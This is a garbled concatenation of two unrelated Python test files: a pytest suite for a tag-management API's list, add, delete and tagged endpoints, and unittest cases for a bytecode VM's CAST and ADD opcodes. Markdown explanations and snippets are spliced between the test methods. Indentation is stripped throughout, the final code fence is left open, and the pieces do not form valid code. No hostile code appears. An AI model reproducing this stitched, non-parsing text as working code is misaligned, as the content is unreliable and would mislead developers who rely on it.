Test-case with invalid request method,
expected output:- status code is 405
"""
resp = client.put(url_prefix + '/tags', headers={'x-access-token': token})
assert resp.status_code == 405
def test_get_tag_list_without_payload_with_data(self, client, url_prefix, token, tag):
"""
        Test-case without payload and with existing node, queries, tags and file_path,
expected output:- status is success, and
count, total_count and resultant data
"""
resp = client.get(url_prefix + '/tags', headers={'x-access-token': token})
assert resp.status_code == 200
response_dict = json.loads(resp.data)
list_dict_data = [
{
'value': tag.value, 'nodes': [node.host_identifier for node in tag.nodes],
'packs': [pack.name for pack in tag.packs],
'queries': [query.name for query in tag.queries],
'file_paths': tag.file_paths
}
for tag in tags_dao.get_all_tags()
]
data = marshal(list_dict_data, tag_wrappers.tag_wrapper)
assert response_dict['status'] == 'success'
assert response_dict['data']['count'] == 1
assert response_dict['data']['total_count'] == 1
assert response_dict['data']['results'] == data
def test_get_tag_list_without_empty_payload_with_data(self, client, url_prefix, token, tag):
"""
        Test-case with payload as an empty dictionary and
with existing node, queries, tags and file_path,
expected output:- status is success, and
count, total_count and resultant data
"""
resp = client.get(url_prefix + '/tags', headers={'x-access-token': token}, json={})
assert resp.status_code == 200
response_dict = json.loads(resp.data)
list_dict_data = [
{
'value': tag.value, 'nodes': [node.host_identifier for node in tag.nodes],
'packs': [pack.name for pack in tag.packs],
'queries': [query.name for query in tag.queries],
'file_paths': tag.file_paths
}
for tag in tags_dao.get_all_tags()
]
data = marshal(list_dict_data, tag_wrappers.tag_wrapper)
assert response_dict['status'] == 'success'
assert response_dict['data']['count'] == 1
assert response_dict['data']['total_count'] == 1
assert response_dict['data']['results'] == data
def test_get_tag_list_with_payload_with_data(self, client, url_prefix, token, tag):
"""
        Test-case with all payload values set (searchterm matches nothing)
        and with existing node, queries, tags and file_path,
expected output:- status is success, and
count, total_count and resultant data
"""
self.payload['start'] = 0
self.payload['limit'] = 5
self.payload['searchterm'] = "abc"
resp = client.get(url_prefix + '/tags', headers={'x-access-token': token}, json=self.payload)
assert resp.status_code == 200
response_dict = json.loads(resp.data)
assert response_dict['status'] == 'success'
assert response_dict['data']['count'] == 0
assert response_dict['data']['total_count'] == 1
assert response_dict['data']['results'] == []
def test_get_tag_list_with_valid_payload_with_data(self, client, url_prefix, token, tag):
"""
        Test-case with all payload values set (searchterm matches the tag)
and with existing node, queries, tags and file_path,
expected output:- status is success, and
count, total_count and resultant data
"""
self.payload['start'] = 0
self.payload['limit'] = 5
self.payload['searchterm'] = "test"
resp = client.get(url_prefix + '/tags', headers={'x-access-token': token}, json=self.payload)
assert resp.status_code == 200
list_dict_data = [
{
'value': tag.value, 'nodes': [node.host_identifier for node in tag.nodes],
'packs': [pack.name for pack in tag.packs],
'queries': [query.name for query in tag.queries],
'file_paths': tag.file_paths
}
for tag in tags_dao.get_all_tags()
]
data = marshal(list_dict_data, tag_wrappers.tag_wrapper)
response_dict = json.loads(resp.data)
assert response_dict['status'] == 'success'
assert response_dict['data']['count'] == 1
assert response_dict['data']['total_count'] == 1
assert response_dict['data']['results'] == data
class TestAddTag:
    """
    For the test cases in this class the payload value is required and
    must be a str; if it is missing or of any other type, the endpoint
    returns 400, i.e. bad request.
    """
payload = {'tag': ''}
def test_tag_without_payload(self, client, url_prefix, token):
"""
Test-case without payloads and without existing tag data,
expected output:- status_code is 400
"""
resp = client.post(url_prefix + '/tags/add', headers={'x-access-token': token})
assert resp.status_code == 400
def test_tag_with_empty_payload(self, client, url_prefix, token):
"""
        Test-case with an empty payload and without existing tag data,
expected output:- status_code is 400
"""
resp = client.post(url_prefix + '/tags/add', headers={'x-access-token': token}, json={})
assert resp.status_code == 400
def test_tag_with_empty_str_payload(self, client, url_prefix, token):
"""
Test-case with payloads value is empty str and without existing tag data,
expected output:- status is failure
"""
resp = client.post(url_prefix + '/tags/add', headers={'x-access-token': token}, json=self.payload)
assert resp.status_code == 200
response_dict = json.loads(resp.data)
assert response_dict['status'] == 'failure'
def test_tag_with_payload_value_none(self, client, url_prefix, token):
"""
Test-case with payloads value is none and without existing tag data,
expected output:- status_code is 400
"""
self.payload['tag'] = None
resp = client.post(url_prefix + '/tags/add', headers={'x-access-token': token}, json=self.payload)
assert resp.status_code == 400
def test_tag_with_invalid_method(self, client, url_prefix, token):
"""
Test-case with invalid request method,
expected output:- status code is 405
"""
resp = client.put(url_prefix + '/tags/add', headers={'x-access-token': token}, json=self.payload)
assert resp.status_code == 405
def test_tag_with_data(self, client, url_prefix, token, tag):
"""
Test-case with payloads value and with existing tag data,
expected output:- status is failure
"""
self.payload['tag'] = 'test'
resp = client.post(url_prefix + '/tags/add', headers={'x-access-token': token}, json=self.payload)
assert resp.status_code == 200
response_dict = json.loads(resp.data)
assert response_dict['status'] == 'failure'
class TestDeleteTag:
    """
    For the test cases in this class the payload value is required and
    must be a str; if it is missing or of any other type, the endpoint
    returns 400, i.e. bad request.
    """
payload = {'tag': ''}
def test_tag_without_payload(self, client, url_prefix, token):
"""
Test-case without payloads and without existing tag data,
expected output:- status_code is 400
"""
resp = client.post(url_prefix + '/tags/delete', headers={'x-access-token': token})
assert resp.status_code == 400
def test_tag_with_empty_payload(self, client, url_prefix, token):
"""
        Test-case with an empty payload and without existing tag data,
expected output:- status_code is 400
"""
resp = client.post(url_prefix + '/tags/delete', headers={'x-access-token': token}, json={})
assert resp.status_code == 400
def test_tag_with_empty_str_payload(self, client, url_prefix, token):
"""
        Test-case with payload value as an empty str and without existing tag data,
        expected output:- status is success
"""
resp = client.post(url_prefix + '/tags/delete', headers={'x-access-token': token}, json=self.payload)
assert resp.status_code == 200
response_dict = json.loads(resp.data)
assert response_dict['status'] == 'success'
def test_tag_with_payload_value_none(self, client, url_prefix, token):
"""
Test-case with payloads value is none and without existing tag data,
expected output:- status_code is 400
"""
self.payload['tag'] = None
resp = client.post(url_prefix + '/tags/delete', headers={'x-access-token': token}, json=self.payload)
assert resp.status_code == 400
def test_tag_with_invalid_method(self, client, url_prefix, token):
"""
Test-case with invalid request method,
expected output:- status code is 405
"""
resp = client.put(url_prefix + '/tags/delete', headers={'x-access-token': token}, json=self.payload)
assert resp.status_code == 405
def test_tag_with_data(self, client, url_prefix, token, tag):
"""
Test-case with payloads value and with existing tag data,
expected output:- status is success
"""
self.payload['tag'] = 'test'
resp = client.post(url_prefix + '/tags/delete', headers={'x-access-token': token}, json=self.payload)
assert resp.status_code == 200
response_dict = json.loads(resp.data)
assert response_dict['status'] == 'success'
class TestTaggedList:
    """
    For the test cases in this class the payload value is required and
    must be a str; more than one tag name may be given as a single
    comma-separated str. If the value is missing or of any other type,
    the endpoint returns 400, i.e. bad request.
    """
payload = {'tags': None}
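Multiple tags travel as one comma-separated string; server-side they are split back into a list (the commented-out `create_tags(*...split(','))` calls below rely on the same convention):

```python
# A payload carrying two tag names in one str, as these tests send it.
payload = {'tags': 'test,test1'}
tags = payload['tags'].split(',')
print(tags)
```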
def test_tagged_tags_without_payload(self, client, url_prefix, token):
"""
Test-case without payload, and
without existing tag, node, packa and queries data,
expected output:- status_code is 400
"""
resp = client.post(url_prefix + '/tags/tagged', headers={'x-access-token': token})
assert resp.status_code == 400
def test_tagged_tags_with_payload_empty_dict(self, client, url_prefix, token):
"""
Test-case with payload is empty dictionary, and
        without existing tag, node, packs and queries data,
expected output:- status_code is 400
"""
resp = client.post(url_prefix + '/tags/tagged', headers={'x-access-token': token}, json={})
assert resp.status_code == 400
def test_tagged_tags_with_payload_value_none(self, client, url_prefix, token):
"""
Test-case with payload values is none, and
        without existing tag, node, packs and queries data,
expected output:- status_code is 400
"""
resp = client.post(url_prefix + '/tags/tagged', headers={'x-access-token': token}, json=self.payload)
assert resp.status_code == 400
def test_tagged_tags_with_single_tag_name(self, client, url_prefix, token):
"""
Test-case with valid single tag name, and
        without existing tag, node, packs and queries data,
        expected output:- status is success,
        and resultant data of hosts, packs and queries values are empty lists in this case.
"""
self.payload['tags'] = 'test'
resp = client.post(url_prefix + '/tags/tagged', headers={'x-access-token': token}, json=self.payload)
assert resp.status_code == 200
response_dict = json.loads(resp.data)
assert response_dict['status'] == 'success'
assert response_dict['data'] == {"hosts": [], "packs": [], "queries": []}
def test_tagged_tags_with_multiple_tag_name(self, client, url_prefix, token):
"""
Test-case with valid multiple tag name, and
        without existing tag, node, packs and queries data,
        expected output:- status is success,
        and resultant data of hosts, packs and queries values are empty lists in this case.
"""
self.payload['tags'] = 'test,test1'
resp = client.post(url_prefix + '/tags/tagged', headers={'x-access-token': token}, json=self.payload)
assert resp.status_code == 200
response_dict = json.loads(resp.data)
assert response_dict['status'] == 'success'
assert response_dict['data'] == {"hosts": [], "packs": [], "queries": []}
def test_tagged_tag_with_invalid_method(self, client, url_prefix, token, tag):
"""
Test-case with invalid request method,
expected output:- status code is 405
"""
self.payload['tags'] = 'test'
resp = client.get(url_prefix + '/tags/tagged', headers={'x-access-token': token}, json=self.payload)
assert resp.status_code == 405
def test_tagged_tag_with_single_tag_name(self, client, url_prefix, token, node, packs, queries, tag):
"""
Test-case with valid single tag name,
        and with existing tag, node, packs and queries data,
expected output:- status is success,
and resultant_data of hosts, packs and queries.
"""
self.payload['tags'] = 'test'
packs = packs_dao.get_pack_by_name('pytest_pack')
nod = hosts_dao.get_node_by_host_identifier('foobar')
query = queries_dao.get_query_by_name('test_query')
# create_tags(*self.payload['tags'].split(','))
t = Tag.query.filter(Tag.value == 'test').first()
packs.tags.append(t)
nod.tags.append(t)
query.tags.append(t)
resp = client.post(url_prefix + '/tags/tagged', headers={'x-access-token': token}, json=self.payload)
assert resp.status_code == 200
response_dict = json.loads(resp.data)
assert response_dict['status'] == 'success'
data = get_tagged_list(['test'])
assert response_dict['data']['hosts'] == data['hosts']
assert response_dict['data']['packs'] == data['packs']
assert response_dict['data']['queries'] == data['queries']
def test_tagged_tag_with_multiple_tag_name(self, client, url_prefix, token, node, packs, queries, tag):
"""
Test-case with valid multiple tag name,
        and with existing tag, node, packs and queries data,
expected output:- status is success,
and resultant_data of hosts, packs and queries.
"""
self.payload['tags'] = 'test,test1'
packs = packs_dao.get_pack_by_name('pytest_pack')
nod = hosts_dao.get_node_by_host_identifier('foobar')
query = queries_dao.get_query_by_name('test_query')
# create_tags(*self.payload['tags'].split(','))
t = Tag.query.filter(Tag.value == 'test').first()
packs.tags.append(t)
nod.tags.append(t)
query.tags.append(t)
resp = client.post(url_prefix + '/tags/tagged', headers={'x-access-token': token}, json=self.payload)
assert resp.status_code == 200
response_dict = json.loads(resp.data)
assert response_dict['status'] == 'success'
data = get_tagged_list(['test', 'test1'])
assert response_dict['data']['hosts'] == data['hosts']
assert response_dict['data']['packs'] == data['packs']
assert response_dict['data']['queries'] == data['queries']
def get_tagged_list(tags):
hosts = [node.get_dict() for node in hosts_dao.get_tagged_nodes(tags) if
node.state != node.DELETED and node.state != node.REMOVED]
packs_queryset = packs_dao.get_tagged_packs(tags)
packs = marshal(packs_queryset, pack_wrappers.pack_wrapper)
for index in range(len(packs)):
packs[index]['tags'] = [tag.to_dict() for tag in packs_queryset[index].tags]
packs[index]['queries'] = marshal(packs_queryset[index].queries, query_wrappers.query_wrapper)
for query_index in range(len(packs_queryset[index].queries)):
packs[index]['queries'][query_index]['tags'] = [tag.to_dict() for tag in
packs_queryset[index].queries[query_index].tags]
packs[index]['queries'][query_index]['packs'] = [pack.name for pack in
packs_queryset[index].queries[query_index].packs]
queries_qs = queries_dao.get_tagged_queries(tags)
queries = marshal(queries_qs, query_wrappers.query_wrapper)
for i in range(len(queries)):
queries[i]['tags'] = [tag.to_dict() for tag in queries_qs[i].tags]
queries[i]['packs'] = [pack.name for pack in queries_qs[i].packs]
    return {"hosts": hosts, "packs": packs, "queries": queries}
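`get_tagged_list()` drops hosts whose state is DELETED or REMOVED before marshaling. That filter in isolation (the state values here are illustrative stand-ins for the model constants):

```python
# Keep only hosts that are neither deleted nor removed.
DELETED, REMOVED, ACTIVE = 'deleted', 'removed', 'active'
nodes = [{'id': 1, 'state': ACTIVE}, {'id': 2, 'state': DELETED}]
hosts = [n for n in nodes if n['state'] not in (DELETED, REMOVED)]
print(hosts)
```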
#!/usr/bin/env python3
# tests/test_vm_binary.py (fraca7/dsremap, MIT)
import unittest
import io
import struct
import base
from vmwrapper import VM, Report
from dsrlib.compiler.opcodes import Opcodes
class TestCast(unittest.TestCase):
def setUp(self):
self._bytecode = io.BytesIO()
def add(self, data):
self._bytecode.write(data)
def add_opcode(self):
self.add(Opcodes.make_opcode(Opcodes.OPCODE_TYPE_BINARY, Opcodes.OPCODE_SUBTYPE_BINARY_CAST, Opcodes.OPCODE_VARIANT_A))
def create(self, stack=None):
vm = VM(bytecode=self._bytecode.getvalue(), stacksize=0 if stack is None else len(stack))
if stack is not None:
vm.push(stack)
return vm, self._bytecode.tell()
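Each test assembles a little-endian bytecode/stack image with `struct` into a `BytesIO` buffer. The packing convention the assertions rely on, in isolation:

```python
import io
import struct

buf = io.BytesIO()
# '<' = little-endian, 'i' = 32-bit int, 'f' = 32-bit float
buf.write(struct.pack('<if', 1, 42.5))
i, f = struct.unpack('<if', buf.getvalue())
print(i, f, buf.tell())
```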
# In theory we don't need to support a const second operand, those are cast at compile time
def test_report_int_report_float(self):
self.add_opcode()
self.add(Opcodes.make_addr_reg(Opcodes.REGINDEX_L2VALUE))
self.add(Opcodes.make_addr_reg(Opcodes.REGINDEX_IMUX))
vm, size = self.create()
report = Report(IMUX=42.5)
vm.step(report)
self.assertEqual(report.L2Value, 42)
self.assertEqual(vm.offset, size)
def test_regoff_int_regoff_float(self):
self.add_opcode()
self.add(Opcodes.make_addr_regoff(Opcodes.REGINDEX_ZR, 4, Opcodes.ADDR_VALTYPE_INT))
self.add(Opcodes.make_addr_regoff(Opcodes.REGINDEX_ZR, 8, Opcodes.ADDR_VALTYPE_FLOAT))
vm, size = self.create(stack=struct.pack('<iif', 1, 13, 42.5))
vm.step(Report())
self.assertEqual(vm.get_stack(), struct.pack('<iif', 1, 42, 42.5))
self.assertEqual(vm.offset, size)
def test_regoff_float_regoff_int(self):
self.add_opcode()
self.add(Opcodes.make_addr_regoff(Opcodes.REGINDEX_ZR, 4, Opcodes.ADDR_VALTYPE_FLOAT))
self.add(Opcodes.make_addr_regoff(Opcodes.REGINDEX_ZR, 8, Opcodes.ADDR_VALTYPE_INT))
vm, size = self.create(stack=struct.pack('<ifi', 1, 42.5, 13))
vm.step(Report())
self.assertEqual(vm.get_stack(), struct.pack('<ifi', 1, 13.0, 13))
self.assertEqual(vm.offset, size)
def test_reg_report(self):
self.add_opcode()
self.add(Opcodes.make_addr_reg(Opcodes.REGINDEX_TH))
self.add(Opcodes.make_addr_reg(Opcodes.REGINDEX_IMUX))
vm, size = self.create()
vm.step(Report(IMUX=42.5))
self.assertEqual(vm.TH, 42)
self.assertEqual(vm.offset, size)
def test_reg_int_regoff_float(self):
        self.add_opcode()
self.add(Opcodes.make_addr_reg(Opcodes.REGINDEX_TH))
self.add(Opcodes.make_addr_regoff(Opcodes.REGINDEX_ZR, 4, Opcodes.ADDR_VALTYPE_FLOAT))
vm, size = self.create(stack=struct.pack('<if', 1, 42.5))
vm.step(Report())
self.assertEqual(vm.TH, 42)
self.assertEqual(vm.offset, size)
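The CAST opcode's float-to-int conversion truncates, which is why 42.5 lands as 42 in the assertions above; the equivalent Python, reading a float32 cell and converting it:

```python
import struct

raw = struct.pack('<f', 42.5)      # a float32 cell as it sits on the stack
(value,) = struct.unpack('<f', raw)
print(int(value))                   # truncation toward zero
```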
class TestAdd(unittest.TestCase):
def setUp(self):
self._bytecode = io.BytesIO()
def add(self, data):
self._bytecode.write(data)
def add_opcode(self, variant):
self.add(Opcodes.make_opcode(Opcodes.OPCODE_TYPE_BINARY, Opcodes.OPCODE_SUBTYPE_BINARY_ADD, variant))
def create(self, stack=None):
vm = VM(bytecode=self._bytecode.getvalue(), stacksize=0 if stack is None else len(stack))
if stack is not None:
vm.push(stack)
return vm, self._bytecode.tell()
# Constant source
def test_reg_C(self):
self.add_opcode(Opcodes.OPCODE_VARIANT_C)
self.add(Opcodes.make_addr_reg(Opcodes.REGINDEX_SP))
self.add(struct.pack('<i', 42))
vm, size = self.create(stack=b'\x00\x00')
vm.step(Report())
self.assertEqual(vm.SP, 44)
self.assertEqual(vm.offset, size)
def test_report_C(self):
self.add_opcode(Opcodes.OPCODE_VARIANT_C)
self.add(Opcodes.make_addr_reg(Opcodes.REGINDEX_L2VALUE))
self.add(struct.pack('<i', 42))
vm, size = self.create()
report = Report(L2Value=9)
vm.step(report)
self.assertEqual(report.L2Value, 9 + 42)
self.assertEqual(vm.offset, size)
def test_constaddr_C_int(self):
self.add_opcode(Opcodes.OPCODE_VARIANT_C)
self.add(Opcodes.make_addr_regoff(Opcodes.REGINDEX_ZR, 9, Opcodes.ADDR_VALTYPE_INT))
self.add(struct.pack('<i', 42))
vm, size = self.create(stack=struct.pack('<iibii', 1, 2, 3, 4, 5))
vm.step(Report())
self.assertEqual(vm.get_stack(), struct.pack('<iibii', 1, 2, 3, 4 + 42, 5))
self.assertEqual(vm.offset, size)
def test_constaddr_C_float(self):
self.add_opcode(Opcodes.OPCODE_VARIANT_C)
self.add(Opcodes.make_addr_regoff(Opcodes.REGINDEX_ZR, 9, Opcodes.ADDR_VALTYPE_FLOAT))
self.add(struct.pack('<f', 42.5))
vm, size = self.create(stack=struct.pack('<iibfi', 1, 2, 3, 4.0, 5))
vm.step(Report())
self.assertEqual(vm.get_stack(), struct.pack('<iibfi', 1, 2, 3, 4.0 + 42.5, 5))
self.assertEqual(vm.offset, size)
def test_regoff_C_int(self):
self.add_opcode(Opcodes.OPCODE_VARIANT_C)
self.add(Opcodes.make_addr_regoff(Opcodes.REGINDEX_SP, -8, Opcodes.ADDR_VALTYPE_INT))
self.add(struct.pack('<i', 42))
vm, size = self.create(stack=struct.pack('<iii', 1, 2, 3))
vm.step(Report())
self.assertEqual(vm.get_stack(), struct.pack('<iii', 1, 2 + 42, 3))
self.assertEqual(vm.offset, size)
def test_regoff_C_float(self):
self.add_opcode(Opcodes.OPCODE_VARIANT_C)
self.add(Opcodes.make_addr_regoff(Opcodes.REGINDEX_SP, -8, Opcodes.ADDR_VALTYPE_FLOAT))
self.add(struct.pack('<f', 42.5))
vm, size = self.create(stack=struct.pack('<ifi', 1, 2.5, 3))
vm.step(Report())
self.assertEqual(vm.get_stack(), struct.pack('<ifi', 1, 2.5 + 42.5, 3))
self.assertEqual(vm.offset, size)
# Same source/target
def test_reg_reg(self):
self.add_opcode(Opcodes.OPCODE_VARIANT_A)
self.add(Opcodes.make_addr_reg(Opcodes.REGINDEX_SP))
self.add(Opcodes.make_addr_reg(Opcodes.REGINDEX_TH))
vm, size = self.create(stack=b'\x00\x00')
vm.TH = 42
vm.step(Report())
self.assertEqual(vm.SP, 2 + 42)
self.assertEqual(vm.offset, size)
def test_report_report(self):
self.add_opcode(Opcodes.OPCODE_VARIANT_A)
self.add(Opcodes.make_addr_reg(Opcodes.REGINDEX_L2VALUE))
self.add(Opcodes.make_addr_reg(Opcodes.REGINDEX_R2VALUE))
vm, size = self.create()
report = Report(L2Value=9, R2Value=42)
vm.step(report)
self.assertEqual(report.L2Value, 9 + 42)
self.assertEqual(vm.offset, size)
def test_constaddr_constaddr_int(self):
self.add_opcode(Opcodes.OPCODE_VARIANT_A)
self.add(Opcodes.make_addr_regoff(Opcodes.REGINDEX_ZR, 4, Opcodes.ADDR_VALTYPE_INT))
self.add(Opcodes.make_addr_regoff(Opcodes.REGINDEX_ZR, 8, Opcodes.ADDR_VALTYPE_INT))
vm, size = self.create(stack=struct.pack('<iii', 1, 13, 42))
vm.step(Report())
self.assertEqual(vm.get_stack(), struct.pack('<iii', 1, 13 + 42, 42))
self.assertEqual(vm.offset, size)
def test_constaddr_constaddr_float(self):
self.add_opcode(Opcodes.OPCODE_VARIANT_A)
self.add(Opcodes.make_addr_regoff(Opcodes.REGINDEX_ZR, 4, Opcodes.ADDR_VALTYPE_FLOAT))
self.add(Opcodes.make_addr_regoff(Opcodes.REGINDEX_ZR, 8, Opcodes.ADDR_VALTYPE_FLOAT))
vm, size = self.create(stack=struct.pack('<iff', 1, 13.5, 42.5))
vm.step(Report())
self.assertEqual(vm.get_stack(), struct.pack('<iff', 1, 13.5 + 42.5, 42.5))
self.assertEqual(vm.offset, size)
def test_regoff_regoff_int(self):
self.add_opcode(Opcodes.OPCODE_VARIANT_A)
self.add(Opcodes.make_addr_regoff(Opcodes.REGINDEX_SP, -8, Opcodes.ADDR_VALTYPE_INT))
self.add(Opcodes.make_addr_regoff(Opcodes.REGINDEX_SP, -12, Opcodes.ADDR_VALTYPE_INT))
vm, size = self.create(stack=struct.pack('<iiii', 1, 2, 3, 4))
vm.step(Report())
self.assertEqual(vm.get_stack(), struct.pack('<iiii', 1, 2, 5, 4))
self.assertEqual(vm.offset, size)
def test_regoff_regoff_float(self):
self.add_opcode(Opcodes.OPCODE_VARIANT_A)
self.add(Opcodes.make_addr_regoff(Opcodes.REGINDEX_SP, -8, Opcodes.ADDR_VALTYPE_FLOAT))
self.add(Opcodes.make_addr_regoff(Opcodes.REGINDEX_SP, -12, Opcodes.ADDR_VALTYPE_FLOAT))
vm, size = self.create(stack=struct.pack('<iffi', 1, 2.5, 3.5, 4))
vm.step(Report())
self.assertEqual(vm.get_stack(), struct.pack('<iffi', 1, 2.5, 6.0, 4))
self.assertEqual(vm.offset, size)
# Reg target
def test_reg_report(self):
self.add_opcode(Opcodes.OPCODE_VARIANT_A)
self.add(Opcodes.make_addr_reg(Opcodes.REGINDEX_SP))
self.add(Opcodes.make_addr_reg(Opcodes.REGINDEX_L2VALUE))
vm, size = self.create(stack=b'\x00\x00')
vm.step(Report(L2Value=42))
self.assertEqual(vm.SP, 44)
self.assertEqual(vm.offset, size)
def test_reg_constaddr(self):
self.add_opcode(Opcodes.OPCODE_VARIANT_A)
self.add(Opcodes.make_addr_reg(Opcodes.REGINDEX_SP))
self.add(Opcodes.make_addr_regoff(Opcodes.REGINDEX_ZR, 9, Opcodes.ADDR_VALTYPE_INT))
vm, size = self.create(stack=struct.pack('<iibii', 1, 2, 3, 42, 13))
vm.step(Report())
self.assertEqual(vm.SP, 17 + 42)
self.assertEqual(vm.offset, size)
def test_reg_regoff(self):
self.add_opcode(Opcodes.OPCODE_VARIANT_A)
self.add(Opcodes.make_addr_reg(Opcodes.REGINDEX_SP))
self.add(Opcodes.make_addr_regoff(Opcodes.REGINDEX_SP, -8, Opcodes.ADDR_VALTYPE_INT))
vm, size = self.create(stack=struct.pack('<iii', 1, 42, 3))
vm.step(Report())
self.assertEqual(vm.SP, 12 + 42)
self.assertEqual(vm.offset, size)
# Report target
def test_report_reg(self):
self.add_opcode(Opcodes.OPCODE_VARIANT_A)
self.add(Opcodes.make_addr_reg(Opcodes.REGINDEX_L2VALUE))
self.add(Opcodes.make_addr_reg(Opcodes.REGINDEX_TH))
vm, size = self.create()
vm.TH = 42
report = Report(L2Value=9)
vm.step(report)
self.assertEqual(report.L2Value, 9 + 42)
self.assertEqual(vm.offset, size)
def test_report_constaddr(self):
self.add_opcode(Opcodes.OPCODE_VARIANT_A)
self.add(Opcodes.make_addr_reg(Opcodes.REGINDEX_L2VALUE))
self.add(Opcodes.make_addr_regoff(Opcodes.REGINDEX_ZR, 9, Opcodes.ADDR_VALTYPE_INT))
vm, size = self.create(stack=struct.pack('<iibii', 1, 2, 3, 42, 13))
report = Report(L2Value=9)
vm.step(report)
self.assertEqual(report.L2Value, 9 + 42)
self.assertEqual(vm.offset, size)
def test_report_regoff(self):
self.add_opcode(Opcodes.OPCODE_VARIANT_A)
self.add(Opcodes.make_addr_reg(Opcodes.REGINDEX_L2VALUE))
self.add(Opcodes.make_addr_regoff(Opcodes.REGINDEX_SP, -8, Opcodes.ADDR_VALTYPE_INT))
vm, size = self.create(stack=struct.pack('<iii', 1, 42, 3))
report = Report(L2Value=9)
vm.step(report)
self.assertEqual(report.L2Value, 9 + 42)
self.assertEqual(vm.offset, size)
# constaddr target
def test_constaddr_reg(self):
self.add_opcode(Opcodes.OPCODE_VARIANT_A)
self.add(Opcodes.make_addr_regoff(Opcodes.REGINDEX_ZR, 4, Opcodes.ADDR_VALTYPE_INT))
self.add(Opcodes.make_addr_reg(Opcodes.REGINDEX_TH))
vm, size = self.create(stack=struct.pack('<ii', 1, 2))
vm.TH = 42;
vm.step(Report())
self.assertEqual(vm.get_stack(), struct.pack('<ii', 1, 2 + 42))
self.assertEqual(vm.offset, size)
def test_constaddr_report_int(self):
self.add_opcode(Opcodes.OPCODE_VARIANT_A)
self.add(Opcodes.make_addr_regoff(Opcodes.REGINDEX_ZR, 4, Opcodes.ADDR_VALTYPE_INT))
self.add(Opcodes.make_addr_reg(Opcodes.REGINDEX_L2VALUE))
vm, size = self.create(stack=struct.pack('<ii', 1, 2))
report = Report(L2Value=42)
vm.step(report)
self.assertEqual(vm.get_stack(), struct.pack('<ii', 1, 2 + 42))
self.assertEqual(vm.offset, size)
def test_constaddr_report_float(self):
self.add_opcode(Opcodes.OPCODE_VARIANT_A)
self.add(Opcodes.make_addr_regoff(Opcodes.REGINDEX_ZR, 4, Opcodes.ADDR_VALTYPE_FLOAT))
self.add(Opcodes.make_addr_reg(Opcodes.REGINDEX_IMUX))
vm, size = self.create(stack=struct.pack('<if', 1, 2.0))
report = Report(IMUX=42.5)
vm.step(report)
self.assertEqual(vm.get_stack(), struct.pack('<if', 1, 2.0 + 42.5))
self.assertEqual(vm.offset, size)
def test_constaddr_regoff_int(self):
self.add_opcode(Opcodes.OPCODE_VARIANT_A)
self.add(Opcodes.make_addr_regoff(Opcodes.REGINDEX_ZR, 4, Opcodes.ADDR_VALTYPE_INT))
self.add(Opcodes.make_addr_regoff(Opcodes.REGINDEX_SP, -8, Opcodes.ADDR_VALTYPE_INT))
vm, size = self.create(stack=struct.pack('<iiii', 1, 2, 3, 4))
vm.step(Report())
self.assertEqual(vm.get_stack(), struct.pack('<iiii', 1, 5, 3, 4))
self.assertEqual(vm.offset, size)
def test_constaddr_regoff_float(self):
self.add_opcode(Opcodes.OPCODE_VARIANT_A)
self.add(Opcodes.make_addr_regoff(Opcodes.REGINDEX_ZR, 4, Opcodes.ADDR_VALTYPE_FLOAT))
self.add(Opcodes.make_addr_regoff(Opcodes.REGINDEX_SP, -8, Opcodes.ADDR_VALTYPE_FLOAT))
vm, size = self.create(stack=struct.pack('<iffi', 1, 2.5, 3.5, 4))
vm.step(Report())
self.assertEqual(vm.get_stack(), struct.pack('<iffi', 1, 6.0, 3.5, 4))
self.assertEqual(vm.offset, size)
# Regoff target
def test_regoff_reg(self):
self.add_opcode(Opcodes.OPCODE_VARIANT_A)
self.add(Opcodes.make_addr_regoff(Opcodes.REGINDEX_SP, -8, Opcodes.ADDR_VALTYPE_INT))
self.add(Opcodes.make_addr_reg(Opcodes.REGINDEX_TH))
vm, size = self.create(stack=struct.pack('<iii', 1, 2, 3))
vm.TH = 42
vm.step(Report())
self.assertEqual(vm.get_stack(), struct.pack('<iii', 1, 2 + 42, 3))
self.assertEqual(vm.offset, size)
def test_regoff_report_int(self):
self.add_opcode(Opcodes.OPCODE_VARIANT_A)
self.add(Opcodes.make_addr_regoff(Opcodes.REGINDEX_SP, -8, Opcodes.ADDR_VALTYPE_INT))
self.add(Opcodes.make_addr_reg(Opcodes.REGINDEX_L2VALUE))
vm, size = self.create(stack=struct.pack('<iii', 1, 2, 3))
vm.step(Report(L2Value=42))
self.assertEqual(vm.get_stack(), struct.pack('<iii', 1, 2 + 42, 3))
self.assertEqual(vm.offset, size)
def test_regoff_report_float(self):
self.add_opcode(Opcodes.OPCODE_VARIANT_A)
self.add(Opcodes.make_addr_regoff(Opcodes.REGINDEX_SP, -8, Opcodes.ADDR_VALTYPE_FLOAT))
self.add(Opcodes.make_addr_reg(Opcodes.REGINDEX_IMUY))
vm, size = self.create(stack=struct.pack('<ifi', 1, 2.5, 3))
vm.step(Report(IMUY=42.5))
self.assertEqual(vm.get_stack(), struct.pack('<ifi', 1, 2.5 + 42.5, 3))
self.assertEqual(vm.offset, size)
def test_regoff_constaddr_int(self):
self.add_opcode(Opcodes.OPCODE_VARIANT_A)
self.add(Opcodes.make_addr_regoff(Opcodes.REGINDEX_SP, -8, Opcodes.ADDR_VALTYPE_INT))
self.add(Opcodes.make_addr_regoff(Opcodes.REGINDEX_ZR, 4, Opcodes.ADDR_VALTYPE_INT))
vm, size = self.create(stack=struct.pack('<iiii', 1, 2, 3, 4))
vm.step(Report())
self.assertEqual(vm.get_stack(), struct.pack('<iiii', 1, 2, 5, 4))
self.assertEqual(vm.offset, size)
def test_regoff_constaddr_float(self):
self.add_opcode(Opcodes.OPCODE_VARIANT_A)
self.add(Opcodes.make_addr_regoff(Opcodes.REGINDEX_SP, -8, Opcodes.ADDR_VALTYPE_FLOAT))
self.add(Opcodes.make_addr_regoff(Opcodes.REGINDEX_ZR, 4, Opcodes.ADDR_VALTYPE_FLOAT))
vm, size = self.create(stack=struct.pack('<iffi', 1, 2.5, 3.5, 4))
vm.step(Report())
self.assertEqual(vm.get_stack(), struct.pack('<iffi', 1, 2.5, 6.0, 4))
self.assertEqual(vm.offset, size)
if __name__ == '__main__':
unittest.main()
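The tests above address stack slots by byte offset, so the layouts built with `struct.pack` determine which field an offset like ZR+9 refers to. A quick standalone sketch (illustrative only, not part of the suite) of why offset 9 in a `<iibii` stack lands on the fourth field:

```python
import struct

# With the '<' prefix there is no alignment padding, so each field's start
# offset is just the running sum of the preceding field sizes.
fmt = "<iibii"  # int(4) int(4) byte(1) int(4) int(4)
sizes = [struct.calcsize("<" + ch) for ch in fmt[1:]]
starts = [sum(sizes[:k]) for k in range(len(sizes))]

print(starts)                # [0, 4, 8, 9, 13]
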